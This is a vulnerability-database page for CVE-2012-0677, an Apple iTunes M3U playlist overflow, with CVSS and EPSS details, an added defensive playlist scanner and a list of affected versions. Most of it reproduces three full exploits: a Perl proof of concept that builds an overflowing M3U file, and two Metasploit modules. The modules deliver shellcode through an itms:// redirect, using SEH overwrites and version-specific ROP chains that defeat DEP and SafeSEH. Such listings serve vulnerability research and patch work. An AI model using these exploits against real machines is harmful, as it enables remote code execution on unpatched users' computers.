Related weaknesses
| CWE-ID | Weakness name | Source |
|---|---|---|
| CWE-119 | Improper Restriction of Operations within the Bounds of a Memory Buffer. The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. | |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 9.3 | | AV:N/AC:M/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.
EPSS score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS percentile
The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare the EPSS score of one CVE against other CVEs.
Exploit information
Exploit Database EDB-ID: 19098
Publication date: 2012-06-12 22:00 +00:00
Author: LiquidWorm
EDB Verified: Yes
#!/usr/bin/perl
#
#
# Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow
#
#
# Vendor: Apple Inc.
# Product web page: http://www.apple.com
# Affected version: 10.6.1.7 and 10.6.0.40
#
# Summary: iTunes is a free application for your Mac or PC. It lets you
# organize and play digital music and video on your computer. It can
# automatically download new music, app, and book purchases across all
# your devices and computers. And it's a store that has everything you
# need to be entertained. Anywhere. Anytime.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a playlist file, which can be exploited to cause a heap based buffer
# overflow when a user opens e.g. a specially crafted .M3U file. Successful
# exploitation could allow execution of arbitrary code on the affected node.
#
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# (940.fc0): Access violation - code c0000005 (!!! second chance !!!)
# eax=41414141 ebx=08508cd8 ecx=41414141 edx=052a6528 esi=052a64b0 edi=0559ef20
# eip=41414141 esp=0012d8e8 ebp=7c90ff2d iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
# <Unloaded_Card.dll>+0x41414130:
# 41414141 ?? ???
#
# ~~~
#
# (6b0.a04): Access violation - code c0000005 (!!! second chance !!!)
# eax=41414141 ebx=00000000 ecx=00000014 edx=41414141 esi=41414141 edi=0187e10d
# eip=0187deec esp=0b0cfcd0 ebp=0b0cfcf0 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
# Defaulted to export symbols for C:\Program Files\Common Files\Apple\Apple Application Support\CoreFoundation.dll -
# CoreFoundation!CFWriteStreamCreateWithAllocatedBuffers+0x40:
# 0187deec 8b00 mov eax,dword ptr [eax] ds:0023:41414141=????????
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
# Tested on: Microsoft Windows XP Professional SP3 EN (32bit)
# Microsoft Windows 7 Ultimate SP1 EN (64bit)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status:
#
# [13.03.2012] Vulnerability discovered in version 10.6.0.40.
# [29.03.2012] Vulnerability present in version 10.6.1.7.
# [11.05.2012] Vendor contacted.
# [11.05.2012] Vendor responds asking more details.
# [11.05.2012] Sent detailed information and PoC code to the vendor.
# [12.05.2012] Vendor begins investigation.
# [14.05.2012] Asked vendor for confirmation.
# [17.05.2012] Vendor confirms the vulnerability, developing patch.
# [17.05.2012] Requested a scheduled patch release date from vendor.
# [18.05.2012] Vendor replies.
# [06.06.2012] Asked vendor for status update.
# [08.06.2012] Vendor shares information about security update.
# [11.06.2012] Vendor releases version 10.6.3 to address this issue.
# [12.06.2012] Coordinated public security advisory released.
#
#
# Advisory ID: ZSL-2012-5093
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2012-5093.php
# Advisory TXT: http://www.zeroscience.mk/codes/itunes_bof.txt
#
# Apple ID: APPLE-SA-2012-06-11-1
# Apple Advisory #1: http://support.apple.com/kb/HT5318
# Apple Advisory #2: http://support.apple.com/kb/HT1222
#
# CVE ID: CVE-2012-0677
# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0677
#
#
# 13.03.2012
#
use strict;
my $FILE = "HIEROGLYPH.m3u";
my $AN = "\x44\x44\x44\x44";
my $EGYPTIAN = "\x43" x 16560;
my $LIKE = "\x42\x42\x42\x42";
#######
#OOOOOOOOOOY
my $WALK="\x23\x45". "\x58\x54\x4D\x33".
"\x55\x0D\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41". "\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41". "\x41". "\x41\x41".
"\x41\x41\x41". "\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41\x41".
"\x41\x41\x41\x41". "\x41\x41\x41\x41".
"\x41\x41\x41".
"\x41\x41\x41".
"\x41\x41\x41".
"\x41\x41\x41\x41".
"\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41\x41". "\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41" x 7691;
my $CRYPT = $WALK.$LIKE.$AN.$EGYPTIAN;
print "\n\n[+] Creating $FILE file...\n";
open ZSL, ">./$FILE" or die "\n[-] Can't open $FILE: $!\n\n"; # 'or' binds looser than '||', so a failed open is actually reported
print ZSL $CRYPT;
print "\n[+] File successfully composed!\n\n";
close ZSL;
Exploit Database EDB-ID: 19387
Publication date: 2012-06-24 22:00 +00:00
Author: Metasploit
EDB Verified: Yes
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple iTunes 10 Extended M3U Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.
When opening an extended .m3u file containing an "#EXTINF:" tag description,
iTunes will copy the content after "#EXTINF:" without appropriate checking
from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary,
which allows code execution under the context of the user.
Please note before using this exploit, you must have precise knowledge of the
victim machine's QuickTime version (if installed), and then select your target
accordingly.
In addition, even though this exploit can be used as remote, you should be aware
the victim's browser behavior when opening an itms link. For example,
IE/Firefox/Opera by default will ask the user for permission before launching the
itms link by iTunes. Chrome will ask for permission, but also spits a warning.
Safari would be an ideal target, because it will open the link without any
user interaction.
},
'Author' =>
[
'Rh0 <rh0[at]z1p.biz>', # discovery and metasploit module
'sinn3r' #Mo' targets & code cleanup, etc
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => ['win'],
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\xfc\xfb\xff\xff" # ADD ESP, -0x404
},
'References' =>
[
[ 'EDB', '19322' ]
],
'DisclosureDate' => "Jun 21 2012",
'Targets' =>
[
# Default package for iTunesSetup104.exe
['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3',
{
'Ret' => 0x669C197B, # ADD ESP,0xD40 / ret [QuickTime.qts]
'ROP_NOP' => 0x66801044 # RET
}
],
# Default package for iTunesSetup1041.exe
[ 'iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3',
{
'Ret' => 0x6693A96B, # ADD ESP,0xD40 / ret [QuickTime.qts]
'ROP_NOP' => 0x66801044 # RET
}
],
[ 'iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3',
{
'Ret' => 0x6693ACBB, # ADD ESP,0xD40 / ret [QuickTime.qts]
'ROP_NOP' => 0x66801044 # RET
}
],
['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3',
{
'Ret' => 0x6693afab, # ADD ESP,0xD40 / ret [QuickTime.qts]
'ROP_NOP' => 0x66801044 # RET
}
]
]
))
end
def on_request_uri(cli,request)
# re-generate the payload
return if ((p = regenerate_payload(cli).encoded) == nil)
host = request.headers['HOST']
agent = request.headers['USER-AGENT']
# iTunes browser link
m3u_location = "itms://#{host}#{get_resource()}/#{rand_text_alphanumeric(8+rand(8))}.m3u"
if request.uri =~ /\.ico$/i
# Discard requests for ico files
send_not_found(cli)
elsif request.uri =~ /\.m3u$/i
print_status("Target: #{target.name}")
print_status("Sending playlist")
send_response(cli, generate_m3u(p), { 'Content-Type' => 'audio/x-mpegurl' })
elsif agent =~ /MSIE (6|7|8)\.0/ and agent =~ /NT 5\.1/
print_status("Redirecting to playlist")
send_response(cli, generate_redirect_ie(m3u_location), { 'Content-Type' => 'text/html' })
elsif agent =~ /NT 5\.1/
# redirect Firefox, Chrome, Opera, Safari to iTunes link
print_status("Redirecting to playlist")
send_redirect(cli, m3u_location)
else
print_status("Unknown User-Agent: #{agent}")
send_not_found(cli)
end
end
# IE did not properly redirect when retrieving an itms:// location redirect via an HTTP header...
# ... so use html
def generate_redirect_ie(m3u_location)
ie_redir = <<-HTML_REDIR
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="refresh" content="0; URL=#{m3u_location}">
</head>
</html>
HTML_REDIR
ie_redir = ie_redir.gsub(/^\t\t\t/, '')
return ie_redir
end
def generate_m3u(payload)
# Bypass stack cookies by triggering a SEH exception before
# the cookie gets checked. SafeSEH is bypassed by using a non
# safeSEH DLL [QuickTime.qts].
# stack buffer overflow ->
# overwrite SEH handler ->
# trigger SEH exception ->
# rewind stack (ADD ESP, ...) and land in ROP NOP sled ->
# virtualprotect and execute shellcode
m3u = '#EXTINF:,'
# stack layout depends on what iTunes is doing (running or not, playing music etc.) ...
# ... so ensure we overwrite a SEH handler to get back to our rop chain
m3u << [target.ret].pack("V") * 0x6a # stack pivot/rewind
m3u << [target['ROP_NOP']].pack("V") * 30 # ROP NOP sled
m3u << gimme_rop
m3u << payload
# 0x1000 should be enough to overflow the stack and trigger SEH
m3u << rand_text_alphanumeric(0x1000 - m3u.length)
return m3u
end
def gimme_rop
# thanx to mona.py :)
rop_chain = [
:popad,
# registers
0x66801044, # EDI: RET
0x7c801ad4, # ESI: VirtualProtect [kernel32.dll]
:jmpesp,
junk,
:ebx, # EBX: Becomes 0x3e8
0xffffffd6, # EDX: Becomes 0x40
0x673650b0, # ECX: lpflOldProtect
0x90909090, #EAX
# correct dwSize and flNewProtect
:modebx,
:addedx,
# throw it on the stack
:pushad
]
# Map gadgets to a specific Quicktime version
rop_chain.map! { |g|
case target.name
when /QuickTime 7\.69/
case g
when :popad then 0x66C3E260
when :jmpesp then 0x669F6E21
when :ebx then 0x4CC48017
when :modebx then 0x669A8648 # xor ebx,4CC483FF; ret
when :addedx then 0x669FC1C6 # add edx, 0x6a; ret
when :pushad then 0x6682A67E
else
g
end
when /QuickTime 7\.70/
case g
when :popad then 0x66926F5B
when :jmpesp then 0x66d6b743
when :ebx then 0x6c1703e8
when :modebx then 0x66b7d8cb # add ebx, 0x93E90000 ; ret
when :addedx then 0x66975556 # add edx, 0x6a; ret
when :pushad then 0x6689B829
else
g
end
when /QuickTime 7\.71/
case g
when :popad then 0x668E2BAA
when :jmpesp then 0x66965F78
when :ebx then 0x6c1703e8
when :modebx then 0x66B7DC4B # add ebx, 0x93E90000 ; ret
when :addedx then 0x66975956 # add edx, 0x6a; ret
when :pushad then 0x66C28B70
else
g
end
when /QuickTime 7\.72/
case g
when :popad then 0x66c9a6c0
when :jmpesp then 0x6697aa03
when :ebx then 0x6c1703e8
when :modebx then 0x66b7de1b # add ebx, 0x93E90000 ; ret
when :addedx then 0x66975c56 # add edx, 0x6a; ret
when :pushad then 0x6684b5c6
else
g
end
end
}
rop_chain.pack("V*")
end
def junk
rand_text_alpha(4).unpack("L")[0].to_i
end
end
=begin
0:000> r
eax=0e5eb6a0 ebx=00000000 ecx=00000183 edx=00000003 esi=0e5eb091 edi=00130000
eip=10ceaa7a esp=0012ee5c ebp=0012ee64 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
iTunes_10000000!iTunesMainEntryPoint+0xb93f3a:
10ceaa7a f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ee64 10356284 iTunes_10000000!iTunesMainEntryPoint+0xb93f3a
0012eea4 1035657c iTunes_10000000!iTunesMainEntryPoint+0x1ff744
0012eed8 1034de49 iTunes_10000000!iTunesMainEntryPoint+0x1ffa3c
00000000 00000000 iTunes_10000000!iTunesMainEntryPoint+0x1f7309
0:000> !address esi
0c720000 : 0d87d000 - 00ea3000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageHeap
Handle 0c720000
0:000> !address edi-10
00030000 : 000ee000 - 00042000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageStack
Pid.Tid d1c.d0c
=end
Exploit Database EDB-ID: 19322
Publication date: 2012-06-20 22:00 +00:00
Author: Rh0
EDB Verified: Yes
##
#
# ============================================================================================
# * Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow Remote Code Execution (2012) *
# ============================================================================================
#
# Date: Jun 20 2012
# Author: Rh0
# Affected Versions: Apple iTunes 10.4.0.80 to 10.6.1.7
# Tested on: Windows XP Professional SP3 EN
#
# http://pastehtml.com/raw/c25uhk4ab.html
#
# ============================================================================================
#
# This seems not to be CVE-2012-0677 as this here is stack based. However it was also fixed
# by Apple without mentioning it in the security fixes http://support.apple.com/kb/HT5318
# of iTunes 10.6.3.25
#
#
# - written for educational purposes -
#
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
# e.g.: put this module into modules/exploit/windows/browser/itunes_extm3u_bof.rb
def initialize(info = {})
super(update_info(info,
'Name' => 'iTunes Extended M3U Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.
When opening an extended .m3u file containing an "#EXTINF:" tag description,
iTunes will copy the content after "#EXTINF:" without appropriate checking
from a heap buffer to a stack buffer and write beyond the stack buffers boundary.
This allows arbitrary code execution.
The Windows XP target has to have QuickTime 7.7.2 installed for this module
to work. It uses a ROP chain from a non safeSEH enabled DLL to bypass DEP and
safeSEH. The stack cookie check is bypassed by triggering a SEH exception.
},
## NOTE ##
# Exploit works best if iTunes is not running and the user browses to a malicious page.
# But even if iTunes is already running and playing music, the exploit worked reliably
#
# remote code execution is possible via itms:// handler, which instructs a browser to open
# iTunes:
# Safari does not prompt for iTunes itms links -> RCE without user interaction
# Firefox, Opera, and IE ask the user for permission to launch iTunes
# Chrome asks for permission and spits a big warning
'Author' =>
[
'Rh0 <rh0 [at] z1p.biz>' # discovery and metasploit module
],
'Version' => '0.0',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => ['win'],
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\xfc\xfb\xff\xff" # ADD ESP, -0x404
},
'Targets' =>
[
['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.7.2 - Windows XP SP3 EN Professional',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
'SEH' => 0x6693afab, # ADD ESP,0xD40 / ret [QuickTime.qts v7.7.2]
'ROP_NOP' => 0x66801044 # RET
}
]
],
'DefaultTarget' => 0
))
register_options(
[
OptPort.new('SRVPORT', [true, "The local port to listen on", 80]),
OptString.new('URIPATH', [false, "The URI to use for this exploit", "/"]),
],
self.class
)
end
def on_request_uri(cli,request)
# re-generate the payload
return if ((p = regenerate_payload(cli).encoded) == nil)
host = request.headers['HOST']
agent = request.headers['USER-AGENT']
# iTunes browser link
m3u_location = "itms://#{host}/#{rand_text_alphanumeric(8+rand(8))}.m3u"
if request.uri =~ /\.ico$/i
# Discard requests for ico files
send_not_found(cli)
#elsif agent =~ /iTunes\/10.6.1/ and agent =~ /Windows XP Professional Service Pack 3/ and request.uri =~ /\.m3u$/i
elsif agent =~ /iTunes/ and agent =~ /Windows XP Professional Service Pack 3/ and request.uri =~ /\.m3u$/i
# exploit iTunes (<= 10.6.1.7) on Windows XP SP3
send_response(cli, generate_m3u(p), { 'Content-Type' => 'audio/x-mpegurl' })
status(request,cli,"Sending playlist")
elsif agent =~ /MSIE (6|7|8)\.0/ and agent =~ /NT 5\.1/
# redirect MSIE to iTunes link
send_response(cli, generate_redirect_ie(m3u_location), { 'Content-Type' => 'text/html' })
status(request,cli,"Redirecting to playlist")
elsif agent =~ /NT 5\.1/
# redirect Firefox, Chrome, Opera, Safari to iTunes link
send_redirect(cli, m3u_location)
status(request,cli,"Redirecting to playlist")
else
send_not_found(cli)
print_status("Unknown User-Agent. Sending 404")
end
end
# IE did not properly redirect when retrieving an itms:// location redirect via an HTTP header...
# ... so use html
def generate_redirect_ie(m3u_location)
ie_redir = <<-HTML_REDIR
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="refresh" content="0; URL=#{m3u_location}">
</head>
</html>
HTML_REDIR
return ie_redir
end
# create the malicious playlist
def generate_m3u(payload)
# Bypass stack cookies by triggering a SEH exception before
# the cookie gets checked. SafeSEH is bypassed by using a non
# safeSEH DLL [QuickTime.qts v7.7.2]. DEP is bypassed by using ROP.
# stack buffer overflow ->
# overwrite SEH handler ->
# trigger SEH exception ->
# rewind stack (ADD ESP, ...) and land in ROP NOP sled ->
# virtualprotect and execute shellcode
target = targets[0]
m3u = '#EXTINF:,'
# stack layout depends on what iTunes is doing (running or not, playing music etc.) ...
# ... so ensure we overwrite a SEH handler to get back to our rop chain
m3u << [target['SEH']].pack("V") * 0x6a # stack pivot/rewind
m3u << [target['ROP_NOP']].pack("V") * 30 # ROP NOP sled
m3u << gimme_rop
m3u << payload
# 0x1000 should be enough to overflow the stack and trigger SEH
m3u << rand_text_alphanumeric(0x1000 - m3u.length)
return m3u
end
def gimme_rop()
# thanx to mona.py :)
rop_chain = [
0x66c9a6c0, # POPAD / RET
# registers
0x66801044, # EDI: RET
0x7c801ad4, # ESI: VirtualProtect [kernel32.dll]
0x6697aa03, # EBP: JMP ESP
junk, # skipped
0x6c1703e8, # EBX: will become 0x3e8 after adding 0x93e90000 (dwSize)
0xffffffd6, # EDX: will become 0x40 after adding 0x6a (flNewProtect)
0x673650b0, # ECX: lpflOldProtect
0x90909090, # EAX: nops
# correct dwSize and flNewProtect
0x66b7de1b, # ADD EBX, 0x93E90000 / RET
0x66975c56, # ADD EDX, 0x6A / RET
# throw it on the stack
0x6684b5c6 # PUSHAD / RET
].pack("V*")
return rop_chain
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def status(req,cli,action)
print_status("Request for #{req.uri} from #{cli.peerhost}:#{cli.peerport}. #{action}")
end
end
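
Both issues listed above are reached through an over-long line in an M3U playlist (an oversized entry after `#EXTM3U` in the first PoC, a roughly 0x1000-byte `#EXTINF:` line in the two modules). The following triage scanner for playlist files is an added example, not code from the advisories, the exploit authors or Apple. The byte limits and all function and constant names are assumptions, and the sample inputs are constructed filler.

```python
import re
from dataclasses import dataclass
from typing import List

# Assumed policy limits (not from the page); tune to the playlists you actually see.
MAX_EXTINF_BYTES = 1024   # "#EXTINF:<seconds>,<title>" lines
MAX_ENTRY_BYTES = 2048    # path/URL lines and any other directive

# Accept CRLF, LF and a bare CR: the first PoC above ends "#EXTM3U" with \x0D only.
LINE_BREAK = re.compile(rb"\r\n|\r|\n")


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based line number within the playlist
    kind: str      # "extinf" or "entry"
    reason: str
    length: int    # length of the offending line in bytes


def control_bytes(line: bytes) -> int:
    """Count C0 control bytes (tab excluded) and DEL; titles and paths should have none."""
    return sum(1 for c in line if (c < 0x20 and c != 0x09) or c == 0x7F)


def scan_m3u(data: bytes) -> List[Finding]:
    """Return findings for lines that are too long or contain control bytes."""
    findings: List[Finding] = []
    for line_no, line in enumerate(LINE_BREAK.split(data), start=1):
        if not line:
            continue
        is_extinf = line[:8].upper() == b"#EXTINF:"
        kind = "extinf" if is_extinf else "entry"
        limit = MAX_EXTINF_BYTES if is_extinf else MAX_ENTRY_BYTES
        if len(line) > limit:
            findings.append(Finding(line_no, kind, f"longer than {limit} bytes", len(line)))
        ctl = control_bytes(line)
        if ctl:
            findings.append(Finding(line_no, kind, f"{ctl} control byte(s)", len(line)))
    return findings


# Constructed samples: plain filler bytes only.
BENIGN = b"#EXTM3U\r\n#EXTINF:123,Artist - Title\r\nmusic/track01.mp3\r\n"
LONG_EXTINF = b"#EXTM3U\r\n#EXTINF:," + b"A" * 0x1000 + b"\r\n"
LONG_ENTRY_CR_ONLY = b"#EXTM3U\r" + b"A" * 3000
CONTROL_IN_TITLE = b"#EXTM3U\n#EXTINF:1,ok\x01\n"

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN), ("long_extinf", LONG_EXTINF),
                         ("long_entry", LONG_ENTRY_CR_ONLY), ("control", CONTROL_IN_TITLE)]:
        print(name, scan_m3u(sample))
```

A finding is a reason to quarantine or inspect the file, not proof of an exploit attempt; the page lists iTunes 10.6.3 as the fixed release.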
Products Mentioned
Configuration 0
Apple>>Itunes >> Version To (including) 10.6.1
Apple>>Itunes >> Version 10.0
Apple>>Itunes >> Version 10.0.1
Apple>>Itunes >> Version 10.1
Apple>>Itunes >> Version 10.1.1
Apple>>Itunes >> Version 10.1.1.4
Apple>>Itunes >> Version 10.1.2
Apple>>Itunes >> Version 10.2
Apple>>Itunes >> Version 10.2.2.12
Apple>>Itunes >> Version 10.3
Apple>>Itunes >> Version 10.3.1
Apple>>Itunes >> Version 10.4
Apple>>Itunes >> Version 10.4.0.80
Apple>>Itunes >> Version 10.4.1
Apple>>Itunes >> Version 10.4.1.10
Apple>>Itunes >> Version 10.5
Apple>>Itunes >> Version 10.5.1
Apple>>Itunes >> Version 10.5.1.42
Apple>>Itunes >> Version 10.5.2
Apple>>Itunes >> Version 10.5.3
Apple>>Itunes >> Version 10.6
References